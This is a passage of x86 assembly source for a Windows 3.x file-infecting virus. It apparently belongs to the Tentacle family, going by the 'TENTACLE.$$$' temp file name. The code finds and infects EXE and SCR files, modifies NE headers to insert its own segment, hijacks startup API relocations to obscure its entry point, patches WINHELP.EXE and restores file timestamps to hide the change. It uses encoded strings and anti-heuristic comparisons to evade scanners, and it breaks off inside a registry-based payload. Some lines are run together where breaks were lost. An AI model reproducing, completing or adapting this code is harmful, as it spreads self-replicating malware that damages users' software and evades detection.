repne scasb                     ; search for the end of the string
dec di                          ; go back to the terminating zero
mov ax, di                      ; AX=end of string
                                ; SI=start of string
sub ax, si                      ; AX=length of string

pop es                          ; restore ES
pop di                          ; restore DI

mov cx, ax                      ; CX=length of string
inc cx                          ; because the LOOP immediately follows
JMP loop_decrypt_wildcard

decrypt_wildcard_loop:
lodsb                           ; load a byte from source string
dec al                          ; decrypt it
stosb                           ; store decrypted byte

loop_decrypt_wildcard:
loop decrypt_wildcard_loop

movsb                           ; move terminating zero
RET

C_windows db "C:\WINDOWS\"
empty_string db 0

; ----- INFECT A DIRECTORY --------------------------------------------------
;
; INPUT:
;   BX - number of files to infect
;   CX - ptr to path to infect (encrypted)
;   DX - ptr to file wildcard ("*.EXE" or "*.SCR", also encrypted)

infect_directory:
push ds                         ; save DS
push es                         ; save ES

push cs                         ; DS=CS
pop ds

push ss                         ; ES=SS
pop es

mov si, cx                      ; SI=ptr to path to decrypt


lea di, [bp.full_filespec]      ; DI=ptr to where full wildcard will
                                ; be stored ("C:\path\*.ext")

push cx                         ; save CX (pointer to path)
CALL decrypt_path               ; decrypt the path to full_filespec

dec di                          ; skip the terminating zero

mov si, dx
CALL decrypt_wildcard           ; decrypt the wildcard to full_filespec

pop si                          ; restore ptr to path in SI
lea di, [bp.full_filename]
CALL decrypt_path
dec di                          ; skip the terminating zero

pop es                          ; restore ES
pop ds                          ; restore DS

mov ah, 4Eh                     ; find first file
mov cx, 2                       ; normal and hidden files
lea dx, [bp.full_filespec]
JMP do_file_search

do_file:
push es                         ; save ES
push di                         ; save DI

push ss                         ; ES=SS
pop es

cld                             ; clear direction flag
lea si, [bp.dta+1Eh]            ; SI=ptr to found filename in DTA
                                ; DI points after the path in
                                ; full_filename

mov cx, 13                      ; 8.3 filename (zero terminated)
rep movsb                       ; copy filename

pop di                          ; restore DI
pop es                          ; restore ES

test byte ptr [bp.dta+15h], 1   ; read only attribute set?
JZ not_readonly

push dx                         ; save DX

mov ax, 3000h                   ; AX=4301h (set file attributes)
add ax, 1301h
xor ch, ch                      ; set high byte of attributes to zero
mov cl, [bp.dta+15h]            ; CL=low byte of attributes
;* and cx, 0FFFEh                ; delete read-only attribute
db 83h, 0E1h, 0FEh              ; fixup - byte match
lea dx, [bp.full_filename]      ; DS:DX=ptr to filename (with path)
int 21h

pop dx                          ; restore DX

JC findnext                     ; error? if so, search on

not_readonly:
CALL infect_file                ; infect the file!
JC findnext                     ; on error while infecting search on!
dec bx                          ; decrement infection counter
JZ done_directory               ; enough files infected?


findnext:
mov ah, 4Fh                     ; find next file

do_file_search:
int 21h                         ; do the file search
JNC do_file                     ; if no error happened, process file

done_directory:
RET

C_win31 db "C:\WIN31\", 0

exe_wildcard db "*.EXE", 0
scr_wildcard db "*.SCR", 0

; ----- INFECT THE FILE -----------------------------------------------------

infect_file:
pushad                          ; save all 32bit registers

mov ax, 3D00h                   ; open file read-only
lea dx, [bp.full_filename]      ; DS:DX=pointer to filename
int 21h
JC exit_infect                  ; exit on error
mov bx, ax                      ; file handle to BX
mov [bp.source_handle], ax      ; save file handle

CALL get_file_date_time_size

mov ah, 3Fh                     ; read DOS header
mov cx, 64                      ; DOS header size
lea dx, [bp.rw_buffer]          ; DS:DX=read buffer
int 21h
JC close_file

mov ax, word ptr [bp.rw_buffer] ; AX=exe marker
dec ax                          ; anti-heuristic
cmp ax, "ZM" - 1                ; EXE file?
JNE close_file                  ; close if not

;* cmp word ptr [bp.rw_buffer+0Ch], 0FFFEh ; maxmem item in DOS
;                                          ; header is infection marker
db 81h, 0BEh, 0A9h, 0, 0FEh, 0FFh ; fixup - byte match
JE close_file                   ; if equal, file is already infected

;* cmp word ptr [bp.rw_buffer+0Ch], 0FFFFh ; maxmem must be standard
db 81h, 0BEh, 0A9h, 0, 0FFh, 0FFh ; fixup - byte match
JNE close_file                  ; if not, don't infect

mov word ptr [bp.rw_buffer+0Ch], 0FFFEh ; mark as infected
cmp word ptr [bp.rw_buffer+18h], 40h ; new exe file?
JB close_file                   ; if not, then close

; set tmp_filename to "C:\TENTACLE.$$$", 0
mov dword ptr [bp.tmp_filename+6], 0F59E6305h
add dword ptr [bp.tmp_filename+6], 56A4DE4Fh
mov word ptr [bp.tmp_filename+0], ":C"
mov dword ptr [bp.tmp_filename+10], "$$.E"
mov dword ptr [bp.tmp_filename+2], 0B1704BC2h
add dword ptr [bp.tmp_filename+2], 9CD5089Ah
mov word ptr [bp.tmp_filename+14], "$"


mov ah, 3Ch                     ; create temporary file
mov cx, 2                       ; with hidden attributes
lea dx, [bp.tmp_filename]       ; DS:DX=ptr to filename
int 21h
JC close_file                   ; exit on error
mov [bp.dest_handle], ax        ; save temp file handle

mov ah, 40h                     ; write DOS header of temp file
mov bx, [bp.dest_handle]        ; BX=file handle
mov cx, 64                      ; CX=length to write
lea dx, [bp.rw_buffer]          ; DS:DX=address write buffer
int 21h
JC close_tmp_file

mov ecx, dword ptr [bp.rw_buffer+3Ch] ; ECX=new exe header offset
mov [bp.new_header_offs], ecx   ; store it
sub ecx, 64                     ; size of dos header (already written)
CALL copy_file_block            ; copy rest of DOS stub
JC close_tmp_file

mov bx, [bp.source_handle]      ; BX=handle of victim file
mov ah, 3Fh                     ; read NE header
mov cx, 64                      ; size of NE header
lea dx, [bp.rw_buffer]          ; DX=offset of buffer
int 21h
JC close_tmp_file

mov ax, word ptr [bp.rw_buffer] ; AX=new exe marker
inc ax                          ; anti-heuristic
cmp ax, "EN" + 1                ; NE exe file?
JNE close_tmp_file              ; if not, then abort infection

mov cl, byte ptr [bp.rw_buffer+32h] ; CL=alignment shift
mov eax, 1                      ; EAX=1
shl eax, cl                     ; EAX=alignment unit
mov [bp.alignment_unit], eax    ; save it
mov cl, byte ptr [bp.rw_buffer+32h] ; CL=alignment shift
mov eax, [bp.file_size]         ; EAX=filesize
shr eax, cl                     ; EAX=filesize in alignment units
mov [bp.new_sect_descr+0], ax   ; save it as offset for the new
                                ; segment that is going to be created
mov eax, [bp.alignment_unit]    ; EAX=alignment unit
dec eax                         ; set all bits below alignment
test eax, [bp.file_size]        ; filesize already aligned?
JZ filesize_already_aligned
inc word ptr [bp.new_sect_descr+0] ; if not, round it up

filesize_already_aligned:
mov ax, cs:segm_phys_size       ; copy physical size of segment
mov [bp.new_sect_descr+2], ax
mov ax, cs:segm_attribs         ; copy segment attributes
mov [bp.new_sect_descr+4], ax
mov ax, cs:segm_virt_size       ; copy virtual size of segment
mov [bp.new_sect_descr+6], ax

cmp word ptr [bp.rw_buffer+22h], 40h ; is the segment table directly
                                ; after the NE header (standard case)?
JNE close_tmp_file              ; if not, better not infect the file

CALL EPO
JC close_tmp_file
mov [bp.module_ordinal], eax    ; save module index and ordinal
mov [bp.our_reloc_offs], edx    ; save offset of relocation item


xor eax, eax                    ; EAX=0
mov ax, word ptr [bp.rw_buffer+22h] ; EAX=offset of segment
                                ; descriptor table from NE hdr
add eax, [bp.new_header_offs]   ; EAX=offset of segment descriptor
                                ; table from file start

push eax                        ; CX:DX=EAX
pop dx
pop cx

mov ax, 4200h                   ; go to segment descriptor table
int 21h

mov ah, 3Fh                     ; read the offset of the first segment
mov cx, 2                       ; read a word
lea dx, [bp.first_segm_offs]    ; DX=offset read buffer
int 21h
JC close_tmp_file

mov ax, 4201h                   ; move file pointer relative to
                                ; current position
mov cx, -1                      ; CX:DX=-2 (new filepointer position)
mov dx, -2
int 21h                         ; set the filepointer back to the
                                ; start of the segment table
JC close_tmp_file

xor eax, eax                    ; EAX=0
mov ax, word ptr [bp.first_segm_offs] ; EAX=aligned file offset
                                ; of first segment
mul [bp.alignment_unit]         ; EAX=file offset of the 1st segment
mov [bp.first_segm_offs], eax   ; save it

mov ebx, dword ptr [bp.rw_buffer+2Ch]
; EBX=beginning of the nonresident-name table (relative to filestart).
; This should be the last table in the NE header.

xor ecx, ecx                    ; ECX=0
mov cx, word ptr [bp.rw_buffer+20h] ; ECX=size of nonresident name
                                ; table in bytes
add ebx, ecx                    ; EBX=size of NE header + all tables
mov dword ptr [bp.end_of_NE_hdr], ebx

sub eax, ebx                    ; EAX=free room between the end of
                                ; the NE header and the first segment

;* cmp eax, 10h                  ; is there enough room left so we can
;                               ; add our stuff (a segment descriptor,
;                               ; a module reference and an imported
;                               ; name) ?
db 66h, 83h, 0F8h, 10h          ; fixup - byte match
JL close_tmp_file               ; if not, we can't infect the file

mov ax, word ptr [bp.rw_buffer+1Ch] ; segment count
inc ax                          ; add another segment
mov word ptr [bp.rw_buffer+1Ch], ax ; save new segment count
mov word ptr [bp.new_entry_CS], ax ; new entry segment index
mov word ptr [bp.new_entry_IP], offset virus_entry ; set new
                                ; entry IP
and byte ptr [bp.rw_buffer+37h], 011110111b ; windows flags:
                                ; kill gangload area

; fixup the offsets of the other NE header tables (all are after the segment


; table and therefore shifted back). It is assumed that all tables are in the
; same order in the file as their offsets are stored in the NE header (except
; for the entry table, which should be the second last).

add word ptr [bp.rw_buffer+4h], 16  ; entry table
add word ptr [bp.rw_buffer+24h], 8  ; resource table
add word ptr [bp.rw_buffer+26h], 8  ; resident-name table
add word ptr [bp.rw_buffer+28h], 8  ; module-reference table
add word ptr [bp.rw_buffer+2Ah], 10 ; imported-name table
add dword ptr [bp.rw_buffer+2Ch], 16 ; nonresident-name table

inc word ptr [bp.rw_buffer+1Eh] ; one more entry in
                                ; module-reference table

mov ah, 40h                     ; write modified NE header to tmp file
mov bx, [bp.dest_handle]        ; BX=temp file handle
mov cx, 64                      ; NE header size
lea dx, [bp.rw_buffer]          ; DX=write buffer offset
int 21h
JC close_tmp_file

xor ecx, ecx                    ; ECX=0
mov cx, word ptr [bp.rw_buffer+1Ch] ; ECX=number of segments
dec cx                          ; ECX=old number of segments
shl cx, 3                       ; shl 3 means mul 8 (size of a
                                ; segment descriptor)
                                ; ECX=old size of segm descriptor tbl
CALL copy_file_block            ; copy segment descriptor table
JC close_tmp_file

mov ah, 40h                     ; write our own segment descriptor
                                ; to the file
mov cx, 8                       ; size of a segment descriptor
lea dx, [bp.new_sect_descr]     ; DX=offset of write buffer
int 21h
JC close_tmp_file

xor ecx, ecx                    ; ECX=0
mov cx, word ptr [bp.rw_buffer+2Ah] ; ECX=offset of imported-name
                                ; table from NE header
mov ax, word ptr [bp.rw_buffer+1Ch] ; entries in segment table
dec ax                          ; AX=old number of segments
shl ax, 3                       ; multiply with 8 (size of a
                                ; segment descriptor)
add ax, word ptr [bp.rw_buffer+22h] ; add offset of segment table
                                ; (from NE header)
                                ; AX=offset end of segment table
                                ; relative to the NE header

sub cx, ax                      ; CX=length of stuff between the
                                ; segment table and the imported-name
                                ; table (resource, resident-name and
                                ; module-reference tables)

sub cx, 10                      ; because the imported-name table
                                ; offset has already been increased
                                ; by 10 before

CALL copy_file_block            ; copy all those tables
JC close_tmp_file

mov ax, word ptr [bp.rw_buffer+4] ; offset entry table (from
                                ; NE header)

sub ax, 6                       ; AX=end of old imported-name table

sub ax, word ptr [bp.rw_buffer+2Ah] ; offset of imported-name


                                ; table from NE header
mov word ptr [bp.tmp_buffer], ax ; AX=offset into imported-name
                                ; table (the one of the module
                                ; name we're going to add)

mov ah, 40h                     ; append our new entry into the
                                ; module reference table, the offset
                                ; of the new module name
mov cx, 2                       ; write one word
lea dx, [bp.tmp_buffer]         ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

xor ecx, ecx                    ; ECX=0
mov cx, word ptr [bp.rw_buffer+4] ; offset entry table (from
                                ; NE header)
sub cx, 6                       ; CX=end of old imported-name table
sub cx, word ptr [bp.rw_buffer+2Ah] ; offset of imported-names
                                ; table from NE header
CALL copy_file_block            ; copy imported-name table
JC close_tmp_file

mov ah, 40h                     ; append our module name to the
                                ; imported-name table
mov cx, 6                       ; length to write
mov word ptr [bp.tmp_buffer+4], "LL" ; create the string
mov dword ptr [bp.tmp_buffer], 6DBBFE87h ; 5, "SHELL"
add dword ptr [bp.tmp_buffer], 0D78C547Eh ; in tmp_buffer
lea dx, [bp.tmp_buffer]         ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

mov cx, word ptr [bp.end_of_NE_hdr] ; end of NE header+all tables
                                ; (offset from filestart)
sub cx, word ptr [bp.rw_buffer+4] ; offset entry table (from
                                ; NE header)
add cx, word ptr [bp.new_header_offs] ; BUG! this should be a sub,
                                ; not an add! but because the
                                ; filepointer is set anew
                                ; immediately afterwards, this
                                ; never causes any problems.
CALL copy_file_block            ; copy the rest of the header
                                ; (entry and nonresident-name tables)
JC close_tmp_file

mov ax, 4200h                   ; set filepointer in the destination
                                ; (temp) file to the start of the
                                ; first segment.
push dword ptr [bp.first_segm_offs]
pop dx                          ; CX:DX=first segment offset
pop cx
int 21h
JC close_tmp_file

mov ax, 4200h                   ; set filepointer in the source file
                                ; to the start of the first segment
mov bx, [bp.source_handle]
push dword ptr [bp.first_segm_offs]
pop dx                          ; CX:DX=first segment offset
pop cx
int 21h
JC close_tmp_file


mov ecx, 0FFFFFFFFh             ; whole file body
CALL copy_file_block            ; copy the file body (all segments
                                ; and relocations)
JC close_tmp_file

xor eax, eax                    ; EAX=0
mov ax, [bp.new_sect_descr+0]   ; EAX=aligned offset of our segment
mov cl, byte ptr [bp.rw_buffer+32h] ; CL=alignment shift
shl eax, cl                     ; EAX=offset of our segment in bytes

push eax                        ; CX:DX=EAX
pop dx
pop cx

mov ax, 4200h                   ; go to our segment offset in file
mov bx, [bp.dest_handle]        ; BX=temp file handle
int 21h
JC close_tmp_file

mov ah, 40h                     ; write virus body to file
mov cx, (RegQueryValue - virus_start) ; write whole virus body
                                ; excluding the three pointers that
                                ; must be relocated and therefore
                                ; initialised with 0000:FFFF
mov dx, offset virus_start      ; DX=offset write buffer=virus body
push ds                         ; save DS
push cs                         ; DS=CS
pop ds
int 21h
pop ds                          ; restore DS
JC close_tmp_file

mov ah, 40h                     ; write relocation stuff
mov cx, size_of_reloc_stuff1    ; size of relocation stuff
mov dx, offset reloc_stuff      ; DX=offset write buffer
push ds                         ; save DS
push cs                         ; DS=CS
pop ds
int 21h
pop ds                          ; restore DS
JC close_tmp_file

mov ah, 40h                     ; write module index
mov cx, 2                       ; one word
lea dx, ss:[bp.rw_buffer+1Eh]   ; number of entries in module
                                ; reference table - our module
                                ; reference is the last
int 21h
JC close_tmp_file

mov ah, 40h                     ; write relocation stuff
mov cx, size_of_reloc_stuff2    ; size of relocation stuff
mov dx, offset reloc_stuff2     ; DX=offset write buffer
push ds                         ; save DS
push cs                         ; DS=CS
pop ds
int 21h
pop ds                          ; restore DS
JC close_tmp_file

mov ah, 40h                     ; write module index


mov cx, 2                       ; one word
lea dx, ss:[bp.rw_buffer+1Eh]   ; number of entries in module
                                ; reference table - our module
                                ; reference is the last
int 21h
JC close_tmp_file

mov ah, 40h                     ; write relocation stuff
mov cx, size_of_reloc_stuff3    ; size of relocation stuff
mov dx, offset reloc_stuff3     ; DX=offset write buffer
push ds                         ; save DS
push cs                         ; DS=CS
pop ds
int 21h
pop ds                          ; restore DS
JC close_tmp_file

mov ah, 40h                     ; write the reference to the API
                                ; we hooked for the EPO
mov cx, 2                       ; CX=4 (size to write)
shl cx, 1                       ; ???
lea dx, [bp.module_ordinal]     ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

push [bp.our_reloc_offs]        ; CX:DX=offset of the relocation item
pop dx                          ; that has to be modified
pop cx
mov ax, 4200h                   ; set filepointer relative to
int 21h                         ; filestart
JC close_tmp_file

mov ah, 40h                     ; write relocation type
mov cx, 2                       ; one word
mov word ptr [bp.tmp_buffer], 3 ; 32bit far ptr/internal reference
lea dx, [bp.tmp_buffer]         ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

mov ax, 4201h                   ; set new file pointer relative to
                                ; current position
mov cx, 0                       ; CX:DX=2 (skip the offset of the
mov dx, 2                       ; dword that must be relocated)
int 21h
JC close_tmp_file

mov ah, 40h                     ; write a far pointer to the virus
                                ; entrypoint.
mov cx, 2                       ; CX=4 (size to write)
shl cx, 1                       ; ???
lea dx, [bp.new_entry_CS]       ; DS:DX=pointer to write buffer
int 21h
JC close_tmp_file

cmp dword ptr [bp.dta+24h], "XE.P" ; check the filename of the
JNE not_winhelp                 ; victim for "WINHELP.EXE" and try to
mov eax, dword ptr [bp.dta+20h] ; patch it if the filename matches
add eax, 98F5548Ah
cmp eax, "LEHN" + 98F5548Ah
JNE not_winhelp
cmp word ptr [bp.dta+28h], "E"
JNE not_winhelp


cmp word ptr [bp.dta+1Eh], "IW"
JNE not_winhelp
CALL patch_winhelp

not_winhelp:
mov ah, 3Eh                     ; close temp file
int 21h

mov bx, [bp.source_handle]      ; BX=victim file handle
mov ah, 3Eh                     ; close victim file
int 21h

lea dx, [bp.tmp_filename]       ; DS:DX=pointer to temp file name
mov ax, 3D00h                   ; reopen temp file read-only
int 21h
JC delete_tmp_file
mov [bp.source_handle], ax      ; save handle

mov ah, 3Ch                     ; truncate victim file
mov cx, 0                       ; no attributes
lea dx, [bp.full_filename]      ; DS:DX=ptr to full victim filename
int 21h
JC delete_tmp_file

mov bx, ax                      ; handle to BX
mov [bp.dest_handle], ax        ; save handle

mov ecx, 0FFFFFFFFh             ; copy the whole temp file over the
CALL copy_file_block            ; victim file

mov ax, 3000h                   ; AX=5701h - set file date and time
add ax, 2701h
mov bx, [bp.dest_handle]        ; BX=handle of victim file
mov dx, [bp.file_date]          ; DX=old file date
mov cx, [bp.file_time]          ; CX=old file time
int 21h

mov ah, 3Eh                     ; close victim file
int 21h

mov bx, [bp.source_handle]      ; BX=handle of temp file
mov ah, 3Eh                     ; close temp file
int 21h

lea dx, [bp.tmp_filename]       ; DS:DX=pointer to temp file name
mov ah, 41h                     ; delete temp file
int 21h

clc                             ; clear carry flag (indicate success)
JMP exit_infect

close_tmp_file:
mov bx, [bp.dest_handle]        ; BX=handle of temp file
mov ah, 3Eh                     ; close temp file
int 21h

delete_tmp_file:
lea dx, [bp.tmp_filename]       ; DS:DX=pointer to temp file name
mov ah, 41h                     ; delete temp file
int 21h

close_file:


mov bx, [bp.source_handle]      ; BX=handle of victim file
mov ah, 3Eh                     ; close victim file
int 21h

stc                             ; set carry flag (indicate error)

exit_infect:
popad                           ; restore all 32bit registers
RET

C_win311 db "C:\WIN311\", 0

; ----- GET DATE, TIME AND SIZE OF THE OPENED FILE --------------------------

get_file_date_time_size:
push cx                         ; save CX and DX
push dx

mov ax, 5700h                   ; get date and time
int 21h

mov [bp.file_date], dx          ; save date
mov [bp.file_time], cx          ; save time

xor cx, cx                      ; CX:DX=0 (distance to move)
xor dx, dx
mov ax, 4202h                   ; move filepointer relative to
int 21h                         ; end of file
                                ; in DX:AX the new filepointer is
                                ; returned (filesize in this case)

mov word ptr [bp.file_size+2], dx ; save filesize
mov word ptr [bp.file_size], ax

xor cx, cx                      ; CX:DX=0 (distance to move)
xor dx, dx
mov ax, 4200h                   ; move filepointer relative to
int 21h                         ; beginning of file

pop dx                          ; restore DX and CX
pop cx
RET

C_win95 db "C:\WIN95\", 0

; ----- COPY ECX BYTES FROM VICTIM FILE TO TEMP FILE ------------------------

copy_file_block:
pushad                          ; save all 32bit registers

sub sp, 256                     ; allocate a 256 byte buffer from stack
mov [bp.bytes_to_copy], ecx     ; save length of block to copy
mov dx, sp                      ; DX=offset buffer

copy_file_block_loop:
cmp [bp.bytes_to_copy], 0       ; whole block moved?
JE copy_file_block_done         ; then we're done
cmp [bp.bytes_to_copy], 256     ; more than 256 bytes left?
JBE copy_remaining_bytes_block


mov cx , 256 ; then just copy 256 bytesJMP read_file_block

copy_remaining_bytes_block :mov cx ,word ptr [ bp.bytes_to_copy ] ; copy all bytes left

read_file_block :push cx ; save size to read/writemov bx ,[ bp.source_handle ] ; BX=handle of source filemov ah, 3Fh ; read from file functionpush ds ; save DSpush ss ; DS=SS

pop dsint 21h

pop ds ; restore DSmov bx ,[ bp.dest_handle ] ; BX=handle of destination filemov cx , ax ; write as many bytes as were readmov ah, 40h ; write block to temporary filepush ds ; save DSpush ss ; DS=SS

pop dsint 21h

pop ds ; restore DScmp cx , ax ; sizes of read block=written block ?pop cx ; restore size to read and writeJNZ copy_file_block_error ; if not equal, then an error occuredcmp cx , ax ; size of read/written block equal

; to the size we planned to read?JNE copy_file_block_done ; if not, we're at the end of the file

cwde ; convert word to dword (AX->EAX)sub [ bp.bytes_to_copy ], eax ; we've copied EAX bytes moreJMP copy_file_block_loop ; copy next file block

copy_file_block_error :stc ; set carry flag (indicate error)JMP copy_file_block_ret

copy_file_block_done :clc ; clear carry flag (indicate success)add sp , 256 ; remove buffer from stackpopad ; restore all 32bit registers

copy_file_block_ret :RET

; ----- SEARCH MODULE NAME --------------------------------------------------
;
; searches the module name pointed to by DX in the imported names table and
; returns in AX its number, otherwise indicates error with carry flag set

search_module_name:
        push    bx                      ; save BX
        push    es                      ; save ES

        sub     sp, 256                 ; reserve a 256 bytes buffer on stack
        mov     di, dx

        push    ss                      ; ES=SS
        pop     es

        xor     eax, eax                ; EAX=0
        mov     ax, word ptr [bp.rw_buffer+28h] ; ptr to module-reference
                                        ; table (from NE header)
        add     eax, [bp.new_header_offs] ; EAX=ptr to module-reference table
                                        ; (from file start)

        push    eax                     ; CX:DX=EAX
        pop     dx
        pop     cx

        mov     ax, 4200h               ; set file pointer relative to
                                        ; file start to module reference table
        int     21h
        JC      module_name_not_found

        mov     ah, 3Fh                 ; read module reference table
        mov     cx, word ptr [bp.rw_buffer+1Eh] ; number of entries in
                                        ; module reference table
        shl     cx, 1                   ; multiply with two (each entry
                                        ; in module reference table is a word)
        mov     dx, sp                  ; DS:DX=ptr to our buffer on stack
        int     21h
        JC      module_name_not_found

        xor     eax, eax                ; EAX=0
        mov     ax, word ptr [bp.rw_buffer+2Ah] ; ptr to imported-names table
                                        ; (relative to NE header)
        add     eax, [bp.new_header_offs] ; EAX=ptr to imported-names table
                                        ; relative to file start

        push    eax                     ; CX:DX=EAX
        pop     dx
        pop     cx

        mov     ax, 4200h               ; set file pointer relative to
                                        ; file start to imported-names table
        int     21h
        JC      module_name_not_found

        mov     ah, 3Fh                 ; read imported-names table
        mov     cx, 128                 ; read 128 bytes
        mov     dx, sp                  ; DS:DX=ptr to buffer on stack
        add     dx, 128                 ; assume module-reference table is
                                        ; not longer than 128 bytes too
        int     21h
        JC      module_name_not_found

        mov     bx, sp                  ; BX=module-reference table buffer
        xor     cx, cx                  ; CX=0
        JMP     check_if_all_modules_done

search_module_name_loop:
        mov     si, sp                  ; SI=buffer on stack
        add     si, 128                 ; SI=imported-names table buffer
        add     si, [bx]                ; add offset from module-reference
                                        ; table to get an actual entry in the
                                        ; imported-names table

        push    cx                      ; save CX (module counter)
        push    di                      ; save DI (offset of module name
                                        ; to search for)

        xor     ch, ch                  ; CH=0
        mov     cl, [si]                ; length of this entry in the
                                        ; imported-names table
        inc     cl                      ; also compare the string-length byte
        cld                             ; clear direction flag
        repe    cmpsb                   ; compare the strings

        pop     di                      ; restore DI (offset of module name
                                        ; to search for)
        pop     cx                      ; restore CX (module counter)

        JZ      found_module_name
        inc     cx                      ; increment CX (module counter)
        add     bx, 2                   ; go to next entry in module-
                                        ; reference table
check_if_all_modules_done:
        cmp     cx, word ptr [bp.rw_buffer+1Eh] ; done all modules ?
        JNE     search_module_name_loop ; if not, search on
        JMP     module_name_not_found   ; if yes, the search failed

found_module_name:
        mov     ax, cx                  ; AX=module counter
        inc     ax                      ; make counter start from 1
        add     sp, 256                 ; remove buffer from stack
        clc                             ; clear carry flag (indicate success)
        JMP     exit_search_module_name

module_name_not_found:
        add     sp, 256                 ; remove buffer from stack
        stc                             ; Set carry flag

exit_search_module_name:
        pop     es                      ; restore ES
        pop     bx                      ; restore BX
        RET

; ----- EPO ENGINE ----------------------------------------------------------
;
; Entry: none
;
; Exit:
; EAX - module index (in LSW) and API ordinal (in MSW) of found reloc item
;       (module_index is the lower word of the EPO_stack_frame pair, so it
;       lands in AX)
; EDX - file offset of relocation item to modify

EPO:
        ; create the string 6, "KERNEL" in tmp_buffer

        mov     dword ptr [bp.tmp_buffer+4], 5AD5762Dh
        mov     dword ptr [bp.tmp_buffer+0], 0F220B44Bh
        add     dword ptr [bp.tmp_buffer+0], 602496BBh
        add     dword ptr [bp.tmp_buffer+4], 0A576CF21h
        lea     dx, [bp.tmp_buffer]     ; DX=pointer to 6, "KERNEL"
        CALL    search_module_name
        JC      check_VBrun
        mov     dx, 5Bh                 ; ordinal of InitTask API
        JMP     search_API_reference

check_VBrun:
        ; create the string 8, "VBRUN300" in tmp_buffer
        mov     dword ptr [bp.tmp_buffer+4], 9062F740h
        mov     dword ptr [bp.tmp_buffer+0], 0EDC4FE68h
        mov     byte ptr [bp.tmp_buffer+8], "0"
        add     dword ptr [bp.tmp_buffer+4], 9FD05715h
        add     dword ptr [bp.tmp_buffer+0], 647D57A0h
        lea     dx, [bp.tmp_buffer]     ; Load effective addr
        CALL    search_module_name
        JC      end_EPO
        mov     dx, 64h                 ; ordinal of THUNRTMAIN API

search_API_reference:
        push    ax                      ; save AX (module index)
        push    dx                      ; save DX (API function ordinal)

        xor     eax, eax                ; EAX=0
        mov     ax, word ptr [bp.rw_buffer+22h] ; segment table offset
                                        ; (relative to NE header)
        add     eax, [bp.new_header_offs] ; EAX=segment table offset (relative
                                        ; to file start)
        xor     ecx, ecx                ; ECX=0
        mov     cx, word ptr [bp.rw_buffer+16h] ; entry code segment index
        dec     cx                      ; make segment counter start at zero
        shl     ecx, 3                  ; multiply with 8 (segment table
                                        ; entry size)
        add     eax, ecx                ; EAX=offset of entry code segment
                                        ; descriptor (from filestart)
        push    eax                     ; CX:DX=EAX
        pop     dx
        pop     cx

        mov     ax, 4200h               ; go to descriptor of entry code segment
        int     21h

        pop     dx                      ; restore DX (API function ordinal)
        pop     ax                      ; restore AX (module index)
        JC      end_EPO
        mov     cl, byte ptr [bp.rw_buffer+32h] ; CL=alignment shift

        push    bp                      ; save BP (main data stack frame)
        sub     sp, size EPO_stack_frame ; create new data buffer on stack
        mov     bp, sp                  ; and set BP to it

        push    cx                      ; save CX (alignment shift)
        mov     [bp.module_index], ax   ; save module index
        mov     [bp.API_ordinal], dx    ; save API function ordinal

        mov     ah, 3Fh                 ; read entry code segment descriptor
        mov     cx, 8                   ; size of a segment descriptor
        lea     dx, [bp.entry_CS_offset] ; DS:DX=pointer to read buffer
        int     21h
        pop     cx                      ; restore CX (alignment shift)
        JC      EPO_failed

        xor     edx, edx                ; EDX=0
        mov     dx, [bp.entry_CS_offset] ; EDX=segment file offset (aligned)
        shl     edx, cl                 ; EDX=segment file offset (in bytes)
        xor     eax, eax                ; EAX=0
        mov     ax, [bp.entry_CS_phys]  ; EAX=segment physical size
        add     edx, eax                ; EDX=file offset of segment relocs
        mov     [bp.entry_CS_relocs], edx ; save it

        push    edx                     ; CX:DX=EDX
        pop     dx
        pop     cx

        mov     ax, 4200h               ; go to entry code segment relocations
        int     21h
        JC      EPO_failed

        mov     ah, 3Fh                 ; read number of relocation items
        mov     cx, 2                   ; read one word
        lea     dx, [bp.relocs_number]  ; DS:DX=pointer to read buffer
        int     21h
        JC      EPO_failed

        xor     ecx, ecx                ; ECX=0
        JMP     check_if_all_relocs_done

search_API_reference_loop:
        push    cx                      ; save CX

        mov     ah, 3Fh                 ; read a relocation item
        mov     cx, 8                   ; size of relocation item
        lea     dx, [bp.reloc_type]     ; DS:DX=ptr to read buffer
        int     21h

        pop     cx
        JC      EPO_failed

        mov     eax, dword ptr [bp.module_index] ; EAX=module index and
                                        ; API ordinal
        cmp     [bp.reloc_what], eax
        JNE     check_next_reloc
        cmp     word ptr [bp.reloc_type], 103h ; check relocation type: must
                                        ; be 32bit far ptr and API ordinal
        JE      found_API_reference

check_next_reloc:
        inc     cx

check_if_all_relocs_done:
        cmp     cx, [bp.relocs_number]
        JNE     search_API_reference_loop
        JMP     EPO_failed

found_API_reference:
        mov     edx, [bp.entry_CS_relocs]
        add     edx, 2
        shl     ecx, 3                  ; ECX=ECX*8 (size of a reloc item)
        add     edx, ecx                ; EDX=offset of reloc item in file
        mov     eax, dword ptr [bp.module_index] ; EAX=module index/API ordinal

        add     sp, size EPO_stack_frame ; clear buffer from stack
        pop     bp                      ; restore old stack frame pointer
        clc                             ; clear carry flag (indicate success)
        JMP     end_EPO

EPO_failed:
        add     sp, size EPO_stack_frame ; clear buffer from stack
        pop     bp
        stc                             ; set carry flag (indicate error)

end_EPO:
        RET

gif_body:
        include gif.inc                 ; the body of the gif file converted
                                        ; to DB instructions
gif_body_size   EQU ($ - offset gif_body)

shell_open_command db "\SHELL\OPEN\COMMAND", 0
l_shell_open_command EQU ($ - offset shell_open_command)

; ----- PAYLOAD -------------------------------------------------------------

payload:
        push    es                      ; save ES
        push    bp                      ; save BP (main stack frame pointer)

        sub     sp, size payload_stack_frame ; reserve room on stack
        mov     bp, sp                  ; setup new stack frame

        push    ax                      ; save AX (what to do flag)

;*      push    dword ptr 1             ; HKEY_CURRENT_USER
        db      66h, 68h, 1, 0, 0, 0    ; fixup - byte match

        mov     word ptr [bp.reg_buffer2], "G." ; name of the subkey: ".GIF",0
        mov     dword ptr [bp.reg_buffer2+2], "FI"
        push    ss                      ; push a far pointer to the name
        lea     ax, [bp.reg_buffer2]    ; of the subkey
        push    ax

        push    ss                      ; push a far pointer to the buffer
        lea     ax, [bp.reg_buffer1]    ; that will hold the return string
        push    ax

        mov     [bp.size_reg_buffer], 40h ; size of buffer for return string
        push    ss                      ; push a far pointer to the
        lea     ax, [bp.size_reg_buffer] ; dword that holds the size for the
        push    ax                      ; return string

        CALL    cs:RegQueryValue        ; far call to the RegQueryValue API

        or      ax, ax                  ; zero means success
        JZ      RegQueryValue_success
